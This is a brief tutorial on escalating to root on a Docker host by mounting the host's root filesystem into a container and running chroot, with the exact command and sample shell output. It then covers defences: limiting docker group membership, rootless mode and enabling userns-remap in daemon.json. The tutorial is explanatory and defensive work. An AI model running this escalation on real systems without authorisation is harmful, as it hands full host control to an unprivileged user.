Docker privilege escalation - Namespace Exploit

Overview

Docker for proper running need root privileges. Following the Peter Parker quote "With great power comes great responsibility" we should focus on securing potential docker vulnerabilities. One of them is Privilege Escalation through Linux Namespace.

Preconditions

• Already logged user in the host
• User in the docker group
• userns-remap disabled

Attack - User with docker group on the host machine

In the beginning, it is required to check if we are added to docker user group, so we can run docker command. There are many commands to do that like: id, groups but the easiest way is just run docker command.

➜  ~ groups
janek adm sudo docker

To gain root privileges on the host machine it is needed to create or use a container with root mount / directory and run chroot command over host catalogue in the container.

docker run -it --rm -v /:/host alpine chroot /host

Result of the command should look like this:

➜  ~ docker run -it --rm -v /:/host alpine chroot /host
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@bf63f8813122:/# 

chroot change working root directory for the current process. In this case, it means that the user gains full privileges on the host.

root@bf63f8813122:/# docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
bf63f8813122        alpine              "chroot /host"      About a minute ago   Up About a minute                       xenodochial_torvalds
root@bf63f8813122:/# cd root
root@bf63f8813122:~# id

How to secure?

• Add only privileged users to docker group
• Use userns-remap
• Run docker in rootless mode (Some docker features may not work properly)

Setting up remapping of the user namespace

Before we start the remap procedure we need to stop docker with all containers reset.

docker container stop $(docker container ls -aq)
sudo systemctl stop docker

Open (If doesn’t’ exists create one) /etc/docker/daemon.json and put the parameter :

{
  "userns-remap": "default"
}

The phrase above add namespace mapping with a default value dockremap every time docker daemon start.

Then we have to restart docker service and reboot

sudo systemctl start docker

After this procedure root under the container is mapped to dockremap user on the host.

Sources

• https://docs-stage.docker.com/engine/security/userns-remap/
• https://docs.docker.com/engine/reference/commandline/dockerd/